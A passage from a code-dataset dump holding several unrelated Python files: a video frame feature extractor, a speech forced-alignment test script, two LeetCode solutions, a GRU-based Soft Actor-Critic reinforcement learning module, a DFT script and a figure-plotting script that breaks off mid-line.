np.savetxt(path, sequence)\r\n\r\n pbar.update(1)\r\n pbar.close()\r\n\r\n def get_frames_for_sample(self, video_infro):\r\n \"\"\"\r\n Given a sample row from the data file, get all the corrsponding frame\r\n filenames.\r\n \"\"\"\r\n path = os.path.join(self.data_path, self.database,\r\n video_infro[0], video_infro[1])\r\n images = sorted(glob.glob(path + '*jpg'))\r\n return images\r\n\r\n\r\n def get_video_parts(self, video_path):\r\n \t\"\"\"Given a full path to a video, return its parts.\"\"\"\r\n \tparts = video_path.split('\\\\')\r\n \tfilename = parts[-1]\r\n \tfilename_no_ext = parts[-1].split('.')[0]\r\n \tpersonname = filename_no_ext.split('_')[0]\r\n \tclassname = parts[-2]\r\n \tdatabasename = self.database\r\n\r\n \treturn databasename, classname, filename_no_ext, filename, personname\r\n\r\n\r\n def check_already_extracted(self, video_parts):\r\n \t\"\"\"Check to see if we created the -0001 frame of this file.\"\"\"\r\n \tdatabasename, classname, filename_no_ext, _, _ = video_parts\r\n \treturn bool(os.path.exists(self.data_path + databasename + '\\\\' +\r\n classname + '\\\\' + filename_no_ext + '-0001.jpg'))\r\n\r\n def get_nb_frames_for_video(self, video_parts):\r\n \t\"\"\"Given video parts of an (assumed) already extracted video,\r\n \t return the number of frames that were extracted.\"\"\"\r\n \tdatabasename, classname, filename_no_ext, _, _ = video_parts\r\n \tgenerated_files = glob.glob(self.data_path + '\\\\' + databasename + \\\r\n '\\\\' + classname + '\\\\' + filename_no_ext + '*.jpg')\r\n \treturn len(generated_files)\r\n\r\n def rescale_list(self, input_list, size):\r\n \"\"\"\r\n Given a list and a size, return a rescaled/samples list. For example, if\r\n we want a list of size 5 and we have a list of size 25, return a new\r\n list of size which is every 5th element of the origina list.\r\n \"\"\"\r\n\r\n if len(input_list) >= size:\r\n # Get the number to skip between iterations.\r\n skip = len(input_list) // size\r\n\r\n # Build our new output.\r\n output = [input_list[i] for i in range(0, len(input_list), skip)]\r\n else:\r\n temp = []\r\n copy = size // len(input_list)\r\n for a_input in input_list:\r\n temp.append([a_input] * copy)\r\n while len(temp) < size:\r\n temp.append([input_list[-1]])\r\n output = list(chain.from_iterable(temp))\r\n return output[:size]\r\n\r\n def get_extracted_sequence(self, sample):\r\n filename = sample['video']\r\n path = self.data_path + '\\\\sequences\\\\' + filename + '-' + \\\r\n str(self.seq_length) + '-' + 'features' + '.txt'\r\n if os.path.isfile(path):\r\n features = pd.read_csv(path, sep=\" \", header=None)\r\n return features.values\r\n else:\r\n return None\r\n\r\ndef main():\r\n video_root_dir = 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\cnn_lstm\\\\data\\\\HMDB'\r\n database_name = 'HMDB'\r\n seq_length = 50\r\n model_dir = 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\inception-2015-12-05'\r\n VideoFeatureExtractor(video_root_dir, database_name,\r\n seq_length, model_dir)\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n","repo_name":"TangxinKevin/RGB_action_recognition","sub_path":"video_feature_extractor.py","file_name":"video_feature_extractor.py","file_ext":"py","file_size_in_byte":7219,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"1156303043","text":"import os\nimport numpy as np\nfrom alignment_helper_fns import *\nfrom audio_utils import *\n\naudio_dir = '/home/prad/datasets/ChildSpeechDataset/child_speech_16_khz'\nmanual_textgrids_dir = '/home/prad/datasets/ChildSpeechDataset/manually-aligned-text-grids/'\nmfa_sat_dir = '/home/prad/datasets/ChildSpeechDataset/mfa_adapted/'\n# mfa_sat_dir = '/home/prad/datasets/ChildSpeechDataset/mfa_with_sat/'\n\nunmatched_manual_textgrid_files = get_all_textgrids_in_directory(manual_textgrids_dir)\naligner_textgrid_files = get_all_textgrids_in_directory(mfa_sat_dir)\ncandidate_aligner_textgrid_files = get_all_textgrids_in_directory(mfa_sat_dir)\nmanual_textgrid_files = []\naudio_files = ['/'.join([audio_dir,_path.split('/')[-2], _path.split('/')[-1][:-8]+'wav'])\n for _path in unmatched_manual_textgrid_files]\n\nfrom create_child_speech_dataset import *\n# csd = ChildSpeechDataset(audio_paths=audio_files)\n\n'''\nneed to match the corresponding files since the files loaded from the code above are out of order\n'''\nmismatched_phoneme = 0\nmismatched_lengths = 0\nprint(len(aligner_textgrid_files))\nfor ii, aligned_tg_file in tqdm.tqdm(enumerate(aligner_textgrid_files)):\n# print(ii)\n _filename = aligned_tg_file.split('/')[-1].replace('-', '_')\n# print(_filename)\n matching_ind = int(np.argwhere([_filename in manual_file for manual_file in unmatched_manual_textgrid_files]).ravel())\n# print(matching_ind)\n matching_gt_file = unmatched_manual_textgrid_files[matching_ind]\n manual_textgrid_files.append(matching_gt_file)\n\ntranscripts = {}\n\n''' Extract transcripts for w2v2 aligner'''\ntranscripts = {}\nfor filename in audio_files:\n fname = filename.split('/')[-1]\n # speaker_dir = filename.split('/')[-2]\n # print(fname)\n # fname = os.path.join(manual_textgrids_dir, speaker_dir, fname[:-8]+'lab')\n fname = filename[:-3] + 'lab'\n # print(fname)\n # break\n f = open(fname)\n _transcript = f.read()\n # print(_transcript)\n transcripts[filename] = _transcript[:-1]\n # break\n\n''' Charsiu setup'''\nfrom src.Charsiu import charsiu_forced_aligner, charsiu_attention_aligner\n# charsiu = charsiu_forced_aligner(aligner='charsiu/en_w2v2_fc_10ms')\nfrom alignment_helper_fns import *\ncharsiu = charsiu_forced_aligner('charsiu/en_w2v2_fc_10ms')\n# charsiu = charsiu_attention_aligner('charsiu/en_w2v2_fs_10ms')\n\ncharisu_tg_files = []\nerror_files = []\ndo_align = True\nif do_align:\n for ii, tgfilepath in tqdm.tqdm(enumerate(manual_textgrid_files)):\n audiofname = tgfilepath.split('/')[-1][:-8] + 'wav'\n speaker_dir = tgfilepath.split('/')[-2]\n tgfilename = tgfilepath.split('/')[-1]\n # audio_path = os.path.join(audio_dir, speaker_dir, audiofname)\n audio_path = audio_files[ii]\n\n output_tg_dir = os.path.join('results/charsiu_w2v2_attention_aligner_10ms/', speaker_dir)\n if not os.path.isdir(output_tg_dir):\n os.makedirs(output_tg_dir, exist_ok=True)\n\n tg_filepath = os.path.join(output_tg_dir, tgfilename)\n _transcript = transcripts[audio_path]\n\n charisu_tg_files.append(tg_filepath)\n # print('************************************************************************')\n # print(audio_path)\n # print(tgfilename)\n # print(_transcript)\n # print(textgridpath_to_phonedf(tgfilepath, phone_key='ha phones'))\n\n # print(tg_filepath)\n try:\n #pd.DataFrame(charsiu.align(audio=audio_path,text=_transcript)[0])\n charsiu.serve(audio = audio_path, text = _transcript, save_to = tg_filepath)\n\n except Exception:\n print('Could not perform alignment for file:\\t ', audio_path)\n error_files.append(tgfilepath)\nestimated_textgrids = [os.path.join('results/charsiu_w2v2_attention_aligner_10ms/', path.split('/')[-2], path.split('/')[-1]) for path in manual_textgrid_files]\nfrom alignment_helper_fns import calc_accuracy_between_textgrid_lists\ncalc_accuracy_between_textgrid_lists(manual_textgrid_files, estimated_textgrids)\n\n\n\n\n\n","repo_name":"pkadambi/charsiu","sub_path":"charsiu_test.py","file_name":"charsiu_test.py","file_ext":"py","file_size_in_byte":4030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"42601824373","text":"\"\"\"\nhttps://leetcode.com/problems/rotate-image/\nRuntime: 36 ms, faster than 37.11% of Python3 online submissions for Rotate Image.\nMemory Usage: 12.8 MB, less than 100.00% of Python3 online submissions for Rotate Image.\n\"\"\"\n\n\nclass Solution:\n def rotate(self, matrix: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n n = len(matrix)\n for r in range(int(n / 2)):\n for c in range(r, n - r - 1):\n temp = matrix[r][c]\n matrix[r][c] = matrix[n - 1 - c][r]\n matrix[n - 1 - c][r] = matrix[n - 1 - r][n - 1 - c]\n matrix[n - 1 - r][n - 1 - c] = matrix[c][n - 1 - r]\n matrix[c][n - 1 - r] = temp\n \n","repo_name":"google-gazzza/algorithm","sub_path":"leetcode/medium/48_rotate_image/hsh2438.py","file_name":"hsh2438.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"11049135896","text":"import torch\nimport numpy as np\nimport torch.nn.functional as F\nimport random\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.distributions import Normal\nfrom functions.LSTM_functions import *\n\n\n\n\ndevice = torch.device(\"cuda:\" + str(0))\n# device = \"mps\" if torch.backends.mps.is_available() else \"cpu\"\n\n\n\n\n\nclass ReplayBufferGRU:\n \"\"\" \n Replay buffer for agent with GRU network additionally storing previous action, \n initial input hidden state and output hidden state of GRU.\n And each sample contains the whole episode instead of a single step.\n 'hidden_in' and 'hidden_out' are only the initial hidden state for each episode, for GRU initialization.\n \"\"\"\n def __init__(self, capacity):\n self.capacity = capacity\n self.buffer = []\n self.position = 0\n\n def push(self, hidden_in, hidden_out, state, action, last_action, reward, next_state, done):\n if len(self.buffer) < self.capacity:\n self.buffer.append(None)\n self.buffer[self.position] = (hidden_in, hidden_out, state, action, last_action, reward, next_state, done)\n self.position = int((self.position + 1) % self.capacity) # as a ring buffer\n\n def sample(self, batch_size):\n s_lst, a_lst, la_lst, r_lst, ns_lst, hi_lst, ho_lst, d_lst=[],[],[],[],[],[],[],[]\n batch = random.sample(self.buffer, batch_size)\n for sample in batch:\n h_in, h_out, state, action, last_action, reward, next_state, done = sample\n s_lst.append(state) \n a_lst.append(action)\n la_lst.append(last_action)\n r_lst.append(reward)\n ns_lst.append(next_state)\n d_lst.append(done)\n hi_lst.append(h_in) # h_in: (1, batch_size=1, hidden_size)\n ho_lst.append(h_out)\n hi_lst = torch.cat(hi_lst, dim=-2).detach() # cat along the batch dim\n ho_lst = torch.cat(ho_lst, dim=-2).detach()\n\n return hi_lst, ho_lst, s_lst, a_lst, la_lst, r_lst, ns_lst, d_lst\n\n def __len__(\n self): # cannot work in multiprocessing case, len(replay_buffer) is not available in proxy of manager!\n return len(self.buffer)\n\n def get_length(self):\n return len(self.buffer)\n\n\n\n\n\n\nclass QNetworkGRU(QNetworkBase):\n def __init__(self, state_space, action_space, hidden_dim, activation=F.relu, output_activation=None):\n super().__init__(state_space, action_space, activation)\n self.hidden_dim = hidden_dim\n\n self.linear1 = nn.Linear(self._state_dim+self._action_dim, hidden_dim)\n self.linear2 = nn.Linear(self._state_dim+self._action_dim, hidden_dim)\n self.lstm1 = nn.GRU(hidden_dim, hidden_dim)\n self.linear3 = nn.Linear(2*hidden_dim, hidden_dim)\n self.linear4 = nn.Linear(hidden_dim, 1)\n # weights initialization\n self.linear4.apply(linear_weights_init)\n \n def forward(self, state, action, last_action, hidden_in):\n \"\"\" \n state shape: (batch_size, sequence_length, state_dim)\n output shape: (batch_size, sequence_length, 1)\n for lstm needs to be permuted as: (sequence_length, batch_size, state_dim)\n \"\"\"\n state = state.permute(1,0,2)\n action = action.permute(1,0,2)\n last_action = last_action.permute(1,0,2)\n # branch 1\n fc_branch = torch.cat([state, action], -1) \n fc_branch = self.activation(self.linear1(fc_branch))\n # branch 2\n lstm_branch = torch.cat([state, last_action], -1) \n lstm_branch = self.activation(self.linear2(lstm_branch)) # linear layer for 3d input only applied on the last dim\n lstm_branch, lstm_hidden = self.lstm1(lstm_branch, hidden_in) # no activation after lstm\n # merged\n merged_branch=torch.cat([fc_branch, lstm_branch], -1) \n\n x = self.activation(self.linear3(merged_branch))\n x = self.linear4(x)\n x = x.permute(1,0,2) # back to same axes as input \n return x, lstm_hidden # lstm_hidden is actually tuple: (hidden, cell) \n\n\n\n\nclass SAC_PolicyNetworkGRU(PolicyNetworkBase):\n def __init__(self, state_space, action_space, hidden_size, action_range=1., init_w=3e-3, log_std_min=-20, log_std_max=2):\n super().__init__(state_space, action_space, action_range=action_range)\n \n self.log_std_min = log_std_min\n self.log_std_max = log_std_max\n self.hidden_size = hidden_size\n \n self.linear1 = nn.Linear(self._state_dim, hidden_size)\n self.linear2 = nn.Linear(self._state_dim+self._action_dim, hidden_size)\n self.lstm1 = nn.GRU(hidden_size, hidden_size)\n self.linear3 = nn.Linear(2*hidden_size, hidden_size)\n self.linear4 = nn.Linear(hidden_size, hidden_size)\n\n self.mean_linear = nn.Linear(hidden_size, self._action_dim)\n self.mean_linear.weight.data.uniform_(-init_w, init_w)\n self.mean_linear.bias.data.uniform_(-init_w, init_w)\n \n self.log_std_linear = nn.Linear(hidden_size, self._action_dim)\n self.log_std_linear.weight.data.uniform_(-init_w, init_w)\n self.log_std_linear.bias.data.uniform_(-init_w, init_w)\n\n\n def forward(self, state, last_action, hidden_in):\n \"\"\" \n state shape: (batch_size, sequence_length, state_dim)\n output shape: (batch_size, sequence_length, action_dim)\n for lstm needs to be permuted as: (sequence_length, batch_size, -1)\n \"\"\"\n state = state.permute(1,0,2)\n last_action = last_action.permute(1,0,2)\n # branch 1\n fc_branch = torch.tanh(self.linear1(state))\n # branch 2\n lstm_branch = torch.cat([state, last_action], -1)\n lstm_branch = F.relu(self.linear2(lstm_branch))\n lstm_branch, lstm_hidden = self.lstm1(lstm_branch, hidden_in) # no activation after lstm\n # merged\n merged_branch=torch.cat([fc_branch, lstm_branch], -1) \n x = F.relu(self.linear3(merged_branch))\n x = F.relu(self.linear4(x))\n x = x.permute(1,0,2) # permute back\n\n mean = self.mean_linear(x)\n # mean = F.leaky_relu(self.mean_linear(x))\n log_std = self.log_std_linear(x)\n log_std = torch.clamp(log_std, self.log_std_min, self.log_std_max)\n \n return mean, log_std, lstm_hidden\n \n def evaluate(self, state, last_action, hidden_in, epsilon=1e-6):\n '''\n generate sampled action with state as input wrt the policy network;\n '''\n mean, log_std, hidden_out = self.forward(state, last_action, hidden_in)\n std = log_std.exp() # no clip in evaluation, clip affects gradients flow\n \n normal = Normal(0, 1)\n z = normal.sample(mean.shape)\n action_0 = torch.tanh(mean + std * z.cuda()) # TanhNormal distribution as actions; reparameterization trick\n action = self.action_range * action_0\n log_prob = Normal(mean, std).log_prob(mean + std * z.cuda()) - torch.log(\n 1. - action_0.pow(2) + epsilon) - np.log(self.action_range)\n # both dims of normal.log_prob and -log(1-a**2) are (N,dim_of_action);\n # the Normal.log_prob outputs the same dim of input features instead of 1 dim probability,\n # needs sum up across the features dim to get 1 dim prob; or else use Multivariate Normal.\n log_prob = log_prob.sum(dim=-1, keepdim=True)\n return action, log_prob, z, mean, log_std, hidden_out\n\n def get_action(self, state, last_action, hidden_in, deterministic=True):\n state = torch.FloatTensor(state).unsqueeze(0).unsqueeze(0).cuda() # increase 2 dims to match with training data\n last_action = torch.FloatTensor(last_action).unsqueeze(0).unsqueeze(0).cuda()\n mean, log_std, hidden_out = self.forward(state, last_action, hidden_in)\n std = log_std.exp()\n \n normal = Normal(0, 1)\n z = normal.sample(mean.shape).cuda()\n action = self.action_range * torch.tanh(mean + std * z)\n\n action = self.action_range * torch.tanh(mean).detach().cpu().numpy() if deterministic else \\\n action.detach().cpu().numpy()\n return action[0][0], hidden_out\n\n\n\n\nclass SAC_Trainer():\n def __init__(self, replay_buffer, state_space, action_space, hidden_dim, action_range, gamma, soft_q_lr, policy_lr, alpha_lr, batch_size, update_itr, reward_scale, target_entropy, soft_tau, train_freq):\n\n\n self.gamma = gamma\n self.batch_size = batch_size\n self.update_itr = update_itr\n self.hidden_dim = hidden_dim\n self.reward_scale = reward_scale\n self.target_entropy = target_entropy\n self.soft_tau = soft_tau\n self.train_freq = train_freq\n\n self.replay_buffer = replay_buffer\n self.soft_q_net1 = QNetworkGRU(state_space, action_space, hidden_dim).to(device)\n self.soft_q_net2 = QNetworkGRU(state_space, action_space, hidden_dim).to(device)\n self.target_soft_q_net1 = QNetworkGRU(state_space, action_space, hidden_dim).to(device)\n self.target_soft_q_net2 = QNetworkGRU(state_space, action_space, hidden_dim).to(device)\n self.policy_net = SAC_PolicyNetworkGRU(state_space, action_space, hidden_dim, action_range).to(device)\n self.log_alpha = torch.zeros(1, dtype=torch.float32, requires_grad=True, device=device)\n #print('Soft Q Network (1,2): ', self.soft_q_net1)\n #print('Policy Network: ', self.policy_net)\n\n for target_param, param in zip(self.target_soft_q_net1.parameters(), self.soft_q_net1.parameters()):\n target_param.data.copy_(param.data)\n for target_param, param in zip(self.target_soft_q_net2.parameters(), self.soft_q_net2.parameters()):\n target_param.data.copy_(param.data)\n\n self.soft_q_criterion1 = nn.MSELoss()\n self.soft_q_criterion2 = nn.MSELoss()\n\n # soft_q_lr = 0.0015\n # policy_lr = 0.0015\n # alpha_lr = 0.0015\n\n self.soft_q_optimizer1 = optim.Adam(self.soft_q_net1.parameters(), lr=soft_q_lr)\n self.soft_q_optimizer2 = optim.Adam(self.soft_q_net2.parameters(), lr=soft_q_lr)\n self.policy_optimizer = optim.Adam(self.policy_net.parameters(), lr=policy_lr)\n self.alpha_optimizer = optim.Adam([self.log_alpha], lr=alpha_lr)\n\n \n def update(self, batch_size, reward_scale=10., auto_entropy=True, target_entropy=-2, gamma=0.975,soft_tau=1e-2):\n hidden_in, hidden_out, state, action, last_action, reward, next_state, done = self.replay_buffer.sample(batch_size)\n # print('sample:', state, action, reward, done)\n\n batch_size = self.batch_size\n reward_scale = self.reward_scale\n gamma = self.gamma\n target_entropy = self.target_entropy\n soft_tau = self.soft_tau\n\n\n state = torch.FloatTensor(np.array(state)).to(device)\n next_state = torch.FloatTensor(np.array(next_state)).to(device)\n action = torch.FloatTensor(np.array(action)).to(device)\n last_action = torch.FloatTensor(np.array(last_action)).to(device)\n reward = torch.FloatTensor(np.array(reward)).unsqueeze(-1).to(device) # reward is single value, unsqueeze() to add one dim to be [reward] at the sample dim;\n done = torch.FloatTensor(np.float32(done)).unsqueeze(-1).to(device)\n\n\n # state = torch.FloatTensor(state).to(device)\n # next_state = torch.FloatTensor(next_state).to(device)\n # action = torch.FloatTensor(action).to(device)\n # last_action = torch.FloatTensor(last_action).to(device)\n # reward = torch.FloatTensor(reward).unsqueeze(-1).to(device) # reward is single value, unsqueeze() to add one dim to be [reward] at the sample dim;\n # done = torch.FloatTensor(np.float32(done)).unsqueeze(-1).to(device)\n\n predicted_q_value1, _ = self.soft_q_net1(state, action, last_action, hidden_in)\n predicted_q_value2, _ = self.soft_q_net2(state, action, last_action, hidden_in)\n new_action, log_prob, z, mean, log_std, _ = self.policy_net.evaluate(state, last_action, hidden_in)\n new_next_action, next_log_prob, _, _, _, _ = self.policy_net.evaluate(next_state, action, hidden_out)\n reward = reward_scale * (reward - reward.mean(dim=0)) / (reward.std(dim=0) + 1e-6) # normalize with batch mean and std; plus a small number to prevent numerical problem\n # Updating alpha wrt entropy\n # alpha = 0.0 # trade-off between exploration (max entropy) and exploitation (max Q) \n if auto_entropy is True:\n alpha_loss = -(self.log_alpha * (log_prob + target_entropy).detach()).mean()\n # print('alpha loss: ',alpha_loss)\n self.alpha_optimizer.zero_grad()\n alpha_loss.backward()\n self.alpha_optimizer.step()\n self.alpha = self.log_alpha.exp()\n else:\n self.alpha = 1.\n alpha_loss = 0\n\n # Training Q Function\n predict_target_q1, _ = self.target_soft_q_net1(next_state, new_next_action, action, hidden_out)\n predict_target_q2, _ = self.target_soft_q_net2(next_state, new_next_action, action, hidden_out)\n target_q_min = torch.min(predict_target_q1, predict_target_q2) - self.alpha * next_log_prob\n target_q_value = reward + (1 - done) * gamma * target_q_min # if done==1, only reward\n q_value_loss1 = self.soft_q_criterion1(predicted_q_value1, target_q_value.detach()) # detach: no gradients for the variable\n q_value_loss2 = self.soft_q_criterion2(predicted_q_value2, target_q_value.detach())\n\n\n self.soft_q_optimizer1.zero_grad()\n q_value_loss1.backward()\n self.soft_q_optimizer1.step()\n self.soft_q_optimizer2.zero_grad()\n q_value_loss2.backward()\n self.soft_q_optimizer2.step() \n\n # Training Policy Function\n predict_q1, _= self.soft_q_net1(state, new_action, last_action, hidden_in)\n predict_q2, _ = self.soft_q_net2(state, new_action, last_action, hidden_in)\n predicted_new_q_value = torch.min(predict_q1, predict_q2)\n policy_loss = (self.alpha * log_prob - predicted_new_q_value).mean()\n\n self.policy_optimizer.zero_grad()\n policy_loss.backward()\n self.policy_optimizer.step()\n \n # print('q loss: ', q_value_loss1, q_value_loss2)\n # print('policy loss: ', policy_loss )\n\n\n # Soft update the target value net\n for target_param, param in zip(self.target_soft_q_net1.parameters(), self.soft_q_net1.parameters()):\n target_param.data.copy_( # copy data value into target parameters\n target_param.data * (1.0 - soft_tau) + param.data * soft_tau\n )\n for target_param, param in zip(self.target_soft_q_net2.parameters(), self.soft_q_net2.parameters()):\n target_param.data.copy_( # copy data value into target parameters\n target_param.data * (1.0 - soft_tau) + param.data * soft_tau\n )\n return predicted_new_q_value.mean()\n\n def save_model(self, path):\n torch.save(self.soft_q_net1.state_dict(), path+'/GRU_q1')\n torch.save(self.soft_q_net2.state_dict(), path+'/GRU_q2')\n torch.save(self.policy_net.state_dict(), path+'/GRU_policy')\n\n def load_model(self, path):\n self.soft_q_net1.load_state_dict(torch.load(path+'/GRU_q1'))\n self.soft_q_net2.load_state_dict(torch.load(path+'/GRU_q2'))\n self.policy_net.load_state_dict(torch.load(path+'/GRU_policy'))\n\n self.soft_q_net1.eval()\n self.soft_q_net2.eval()\n self.policy_net.eval()\n\n\ndef plot(rewards):\n # clear_output(True)\n plt.figure(figsize=(20,5))\n plt.plot(rewards)\n plt.savefig('sac_v2_GRU.png')\n # plt.show()\n\n","repo_name":"CiciDu/Multifirefly-Project","sub_path":"functions/GRU_functions.py","file_name":"GRU_functions.py","file_ext":"py","file_size_in_byte":15707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32161078955","text":"# Question: https://leetcode.com/explore/featured/card/august-leetcoding-challenge/550/week-2-august-8th-august-14th/3423/\r\n\r\n\"\"\"\r\nGiven a string which consists of lowercase or uppercase letters, find the length of the longest palindromes that can be built with those letters.\r\nThis is case sensitive, for example \"Aa\" is not considered a palindrome here.\r\nNote: Assume the length of given string will not exceed 1,010.\r\n\r\nExample:\r\n Input: \"abccccdd\"\r\n Output: 7\r\n Explanation: One longest palindrome that can be built is \"dccaccd\", whose length is 7.\r\n\"\"\"\r\n\r\nfrom collections import Counter\r\n\r\nclass Solution:\r\n def longestPalindrome(self, s: str) -> int:\r\n counter = Counter(s)\r\n ans = 0\r\n any_odd = False\r\n \r\n for i in counter:\r\n if not any_odd and counter[i]&1:\r\n any_odd = True\r\n ans += 1\r\n ans += 2 * (counter[i]//2)\r\n \r\n return ans","repo_name":"patel-himanshu/leetcode-problems","sub_path":"2020 - August LeetCoding Challenge/409-longest-palindrome.py","file_name":"409-longest-palindrome.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33744246112","text":"import sys\nimport math\nimport cmath\n\ndef dft(varray):\n n = len(varray)\n f = list()\n for t in range(0, n):\n s = 0\n for x in range(0, n):\n s += varray[x] * cmath.exp(-1j * 2*math.pi/n * t * x)\n f.append(s)\n return f\n\ndef invdft(varray):\n n = len(varray)\n f = list()\n for t in range(0, n):\n s = 0\n for x in range(0, n):\n s += varray[x] * cmath.exp(1j * 2*math.pi/n * t * x)\n f.append(s/n)\n return f\n\nif len(sys.argv) != 2 :\n exit\n\nprint(sys.argv[1])\n\ndata = list()\nwith open(sys.argv[1]) as f:\n for aline in f:\n print(aline.strip())\n data.append(float(aline))\n\nn = 2 ** math.ceil(math.log(len(data),2))\nfor i in range(len(data), n):\n data.append(0)\n\nprint()\ntdata = dft(data)\nfor val in tdata:\n print(round(abs(val),4))\n\n#print(invfft(tdata))","repo_name":"una1veritas/Algorithm-Design","sub_path":"PyFFT/DFT/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37944428309","text":"\"\"\"\nPlot Figure 5. Simply run\n\n $ python plot_fig5.py\n\nMake sure to run\n\n $ python fig5a.py 200\n\nand \n\n $ python fig5bc_6a.py 1e8 200\n $ python fig5bc_6a.py 1e9 200\n\nbefore running this code.\n\nAuthor: Matheus Rolim Sales\nLast modified: 05/12/2022\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom functions import plot_params\nimport matplotlib as mpl\nfrom scipy.interpolate import interp1d\nimport os\n\ncolor1 = 'r'\ncolor2 = 'lime'\ncolor3 = 'gold'\n\ncolor1 = 'dodgerblue'\ncolor2 = 'red'\ncolor3 = 'lime'\n\nmarker = 'x'\nms = 0.01\n\nplot_params(fontsize=32, tick_labelsize=30, axes_labelsize=33)\nmpl.rcParams['axes.linewidth'] = 1.6 #set the value globally\nfig, ax = plt.subplots(1, 3, facecolor='w', figsize=(22, 6))\n\n####################\n# --- Fig 5(a) --- #\n####################\nn = 200\nNtot = int(1e10)\nexponent = int(np.log10(Ntot))\nbase = int(Ntot/10**exponent)\nxbox = 0.0062\nybox = 0.93\nbbox = {'linewidth': 0.0, 'facecolor': 'white', 'alpha': 1.0, 'pad': 1}\npath = 'Data/'\ndatafile = path + 'fig5a_Ntot=%ie%i_n=%i.dat' % (base, exponent, n)\n# Checks if datafile exists\nif not os.path.isfile(datafile):\n import sys\n print('%s does not exist!\\nDid you run fig5a.py?\\nStopping execution...' % (datafile))\n sys.exit()\nprint('Extracting data from %s...' % datafile)\ndf = pd.read_csv(datafile, header=None, delim_whitespace=True)\nX = np.array(df[0])\n# Fig 5bc - blue\ns01a = 0.6\nsf1a = 0.8\n# Fig 5bc - red\ns01b = 1.25\nsf1b = 1.33\n# Fig 5bc - green\ns01c = sf1b\nsf1c = 1.48\n# Fig 5bc - black\ns02 = sf1c\nsf2 = 1.55\nbin_heights, bin_borders, _ = ax[0].hist(X, density=True, histtype='step', color='k', bins='auto')\nbin_widths = np.diff(bin_borders)\nbin_centers = bin_borders[:-1] + bin_widths / 2\nx = bin_centers\ny = bin_heights\nprint(\"Interpolating the data...\")\nf = interp1d(x, y, kind='cubic')\nprint('Plotting the data...')\nax[0].fill_between(np.linspace(s01a, sf1a), f(np.linspace(s01a, sf1a)), alpha=0.95, color=color1)\nax[0].fill_between(np.linspace(s01b, sf1b), f(np.linspace(s01b, sf1b)), alpha=0.95, color=color2)\nax[0].fill_between(np.linspace(s01c, sf1c), f(np.linspace(s01c, sf1c)), alpha=0.95, color=color3)\nax[0].fill_between(np.linspace(s02, sf2), f(np.linspace(s02, sf2)), alpha=0.95, color='k')\n_ = ax[0].set_xlabel('$\\\\mathrm{RTE}(%i)$' % n), ax[0].set_ylabel('$P(\\\\mathrm{RTE}(%i))$' % n), ax[0].set_xlim(0, 4), ax[0].set_yticks([0, 0.5, 1, 1.5])\nax[0].text(xbox, ybox, '(a)', transform=ax[0].transAxes, bbox=bbox)\nax[0].set_xticks([0, 1, 2, 3, 4])\n# --- Inset --- #\nax_ins = ax[0].inset_axes([0.145, 0.4, 0.525, 0.45])\nax_ins.plot(np.arange(len(X)), X, 'k-', lw=0.1)\n#ax[0].set_xscale('log')\nax_ins.set_xlim(40000, 70000)\nax_ins.set_xticks([40000, 70000])\n#ax_ins.set_xticklabels(['$4.0\\\\times10^4$', '$8.0\\\\times10^4$'])\nax_ins.set_xlabel('$i$', fontsize=23)\nax_ins.set_ylabel('$\\\\mathrm{RTE}(200)$', fontsize=23)\nax_ins.set_yticks([0, 2.5, 5])\nax_ins.tick_params(axis='x', which='major', pad=10, labelsize=20)\nax_ins.tick_params(axis='y', which='major', labelsize=20)\nprint()\n\n####################\n# --- Fig 5(b) --- #\n####################\n\nn = 200\nNtot = int(1e8)\nexponent = np.log10(Ntot)\nbase = int(Ntot/10**exponent)\n\ndatafile1a = path + 'fig5b_blue_Ntot=%ie%i_n=%i.dat' % (base, exponent, n)\ndatafile1b = path + 'fig5b_red_Ntot=%ie%i_n=%i.dat' % (base, exponent, n)\ndatafile1c = path + 'fig5b_green_Ntot=%ie%i_n=%i.dat' % (base, exponent, n)\ndatafile2 = path + 'fig5b_black_Ntot=%ie%i_n=%i.dat' % (base, exponent, n)\n\n# Checks if datafile exists\nif not os.path.isfile(datafile2):\n import sys\n print('%s does not exist!\\nDid you run fig5bc_6a.py?\\nStopping execution...' % (datafile2))\n sys.exit()\nprint('Extracting data from %s...' % datafile1c)\ndf = pd.read_csv(datafile1c, header=None, delim_whitespace=True)\nx = np.array(df[0])\ny = np.array(df[1])\nprint('Plotting the data...')\nax[1].plot(x, y, 'x', c=color3, markersize=ms)\n\nprint('Extracting data from %s...' % datafile1b)\ndf = pd.read_csv(datafile1b, header=None, delim_whitespace=True)\nx = np.array(df[0])\ny = np.array(df[1])\nprint('Plotting the data...')\nax[1].plot(x, y, 'x', c=color2, markersize=ms)\n\nprint('Extracting data from %s...' % datafile1a)\ndf = pd.read_csv(datafile1a, header=None, delim_whitespace=True)\nx = np.array(df[0])\ny = np.array(df[1])\nprint('Plotting the data...')\nax[1].plot(x, y, 'x', c=color1, markersize=ms)\n\nprint('Extracting data from %s...' % datafile2)\ndf = pd.read_csv(datafile2, header=None, delim_whitespace=True)\nx = np.array(df[0])\ny = np.array(df[1])\nprint('Plotting the data...')\nax[1].plot(x, y, 'x', c='k', markersize=ms)\n\n\nax[1].text(xbox, ybox, '(b)', transform=ax[1].transAxes, bbox=bbox)\n\nLW = 1.5\ncolor = 'red'\nax[1].plot([1.45, 2.2], [-0.2, -0.2], '--', c=color, lw=LW)\nax[1].plot([2.2, 2.2], [-0.2, 1.7], '--', c=color, lw=LW)\nax[1].plot([1.45, 2.2], [1.7, 1.7], 